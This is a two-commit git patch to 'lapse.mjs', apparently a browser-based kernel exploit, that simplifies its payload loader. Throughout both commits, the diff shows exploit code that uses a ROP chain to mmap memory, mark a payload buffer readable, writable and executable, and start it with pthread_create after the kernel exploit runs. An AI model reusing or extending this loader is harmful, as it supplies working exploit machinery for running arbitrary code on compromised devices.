From 19c2ae770906d2fa4842fe4815c26ca773a8de01 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?J=C4=81nis?= <97699850+janisslsm@users.noreply.github.com>
Date: Sun, 18 May 2025 00:24:42 +0300
Subject: [PATCH 1/2] simplified payload loader code

---
 lapse.mjs | 38 ++++++++------------------------------
 1 file changed, 8 insertions(+), 30 deletions(-)

diff --git a/lapse.mjs b/lapse.mjs
index eaa7dff..36ddc33 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -140,7 +140,6 @@ const num_leaks = 5;
 const num_clobbers = 8;
 
 let chain = null;
-var nogc = [];
 async function init() {
     await rop.init();
     chain = new Chain();
@@ -1736,39 +1735,18 @@ export async function kexploit() {
 }
 
 kexploit().then(() => {
-    function malloc(sz) {
-        var backing = new Uint8Array(0x10000 + sz);
-        nogc.push(backing);
-        var ptr = mem.readp(mem.addrof(backing).add(0x10));
-        ptr.backing = backing;
-        return ptr;
-    }
-
-    function malloc32(sz) {
-        var backing = new Uint8Array(0x10000 + sz * 4);
-        nogc.push(backing);
-        var ptr = mem.readp(mem.addrof(backing).add(0x10));
-        ptr.backing = new Uint32Array(backing.buffer);
-        return ptr;
-    }
-    window.pld_size = new Int(0x26200000, 0x9);
-
-    var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
-    var payload = window.pld;
-    var bufLen = payload.length * 4
-    var payload_loader = malloc32(bufLen);
-    var loader_writer = payload_loader.backing;
-    for (var i = 0; i < payload.length; i++) {
-        loader_writer[i] = payload[i];
-    }
-    chain.sys('mprotect', payload_loader, bufLen, (0x1 | 0x2 | 0x4));
-    var pthread = malloc(0x10);
+    var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, 7, 0x41000, -1, 0);
+    var payload_loader = new View4(window.pld);
+    chain.sys('mprotect', payload_loader.addr, payload_loader.size, (0x1 | 0x2 | 0x4));
+    const ctx = new Buffer(0x10);
+    const pthread = new Pointer();
+    pthread.ctx = ctx;
 
     call_nze(
         'pthread_create',
-        pthread,
+        pthread.addr,
         0,
-        payload_loader,
+        payload_loader.addr,
         payload_buffer,
     );
 })
\ No newline at end of file

From f9c7ae48e4901f8dd5688adc829e7d46ee435b1d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?J=C4=81nis?= <97699850+janisslsm@users.noreply.github.com>
Date: Sun, 18 May 2025 00:32:53 +0300
Subject: [PATCH 2/2] add constants for mprotect

---
 lapse.mjs | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/lapse.mjs b/lapse.mjs
index 36ddc33..f3f8919 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -96,6 +96,9 @@ const CPU_LEVEL_WHICH = 3;
 const CPU_WHICH_TID = 1;
 
 // sys/mman.h
+const PROT_READ = 1;
+const PROT_WRITE = 2;
+const PROT_EXEC = 4;
 const MAP_SHARED = 1;
 const MAP_FIXED = 0x10;
 
@@ -1737,7 +1740,7 @@ export async function kexploit() {
 kexploit().then(() => {
     var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, 7, 0x41000, -1, 0);
     var payload_loader = new View4(window.pld);
-    chain.sys('mprotect', payload_loader.addr, payload_loader.size, (0x1 | 0x2 | 0x4));
+    chain.sys('mprotect', payload_loader.addr, payload_loader.size, PROT_READ | PROT_WRITE | PROT_EXEC);
     const ctx = new Buffer(0x10);
     const pthread = new Pointer();
     pthread.ctx = ctx;